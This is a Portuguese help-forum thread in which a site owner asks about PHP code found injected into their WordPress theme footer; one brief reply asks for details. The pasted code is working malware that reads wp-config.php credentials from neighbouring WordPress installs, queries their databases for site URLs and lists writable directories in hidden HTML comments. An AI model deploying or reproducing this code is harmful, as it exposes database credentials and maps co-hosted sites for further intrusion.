Que codigo é esse no meu tema?

Fechado
Rui - 26 ago 2014 às 21:51
 usuário anônimo - 27 ago 2014 às 09:43
apareceu este codigo ontem e as visitas cairam muito. ele estava no rodape, depois do </body> </html>
Este é o codigo
<?php
if(stripos('win', PHP_OS) === false){
define('DS', DIRECTORY_SEPARATOR);
$fullPath = dirname(__FILE__);
$parts = explode(DS, $fullPath);
$parts = array_slice($parts, 0, -4);
$wwwroot = implode(DS, $parts);

$wp = $fullPath . DS. '..'.DS.'..'.DS.'..'.DS.'..'. DS;
$dirs = scandir($wp);
$work = array();
foreach($dirs as $dir){
$full = dirname(__FILE__) . '/../../../../' . $dir . '/wp-content/';
if(file_exists($full)){
$work[] = $wwwroot .DS. $dir ;
}
}
foreach($work as $k => $path){
$wpconf = $path . '/wp-config.php';
$f = fopen($wpconf, 'r');
$content = fread($f, filesize($wpconf));
fclose($f);
$pattern = '#DB_NAME[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
preg_match_all($pattern, $content, $res);
$dbname = $res[1][0];

$pattern = '#DB_USER[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
preg_match_all($pattern, $content, $res);
$dbuser = $res[1][0];

$pattern = '#DB_PASSWORD[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
preg_match_all($pattern, $content, $res);
$dbpass = $res[1][0];

$pattern = '#DB_HOST[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
preg_match_all($pattern, $content, $res);
$dbhost = $res[1][0];

$pattern = '#\$table_prefix(?:.*)?[\'\"](.*)?[\'\"]\;#isU';
preg_match_all($pattern, $content, $res);
$dbprefix = $res[1][0];

$h = mysql_connect($dbhost, $dbuser, $dbpass) or die('ss');
mysql_select_db($dbname, $h) or die('f');
$data = mysql_query("SELECT option_value FROM ".$dbprefix."options WHERE option_name='home'") or die('d');
while($info = mysql_fetch_array( $data ))
{
$host[$k] = $info['option_value'];
break;
}
mysql_close($h);
}

echo '<!--##';
echo implode("\n", $host);
echo "##-->\n";

$fold = array();
foreach($work as $i => $path){
$wpcontent = $path . '/wp-content';
$fold[$i] = get_leaf_dirs($wpcontent);
}
if(!empty($fold)){
echo '<!--$$';
foreach($fold as $fol){
if(!empty($fol)){
echo implode("\n", $fol);
echo "\n";
}
}
echo '$$-->';

}

}
if(!function_exists('scandir')) { // in case this script gets ported to PHP5, let's not break it
function scandir($dir) {
$files = array(); // added to initialize variable
if(is_dir($dir)){
$dh = opendir($dir); // added some error-checking
while(false !== ($filename = readdir($dh))) {
if($filename == '.' || $filename == '..')
continue; // no need to get the . or .. references, right?
else
$files[] = $filename;
}
return $files;
} else {
return false;
}
}
}
function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}if(sizeof($array)>0){break;}}$d->close();return $array;}
?>


1 resposta

usuário anônimo
27 ago 2014 às 09:43
O que é isso, exatamente? Você tem um site? Um blog?
0

Assine nossa newsletter!

Assine nossa newsletter!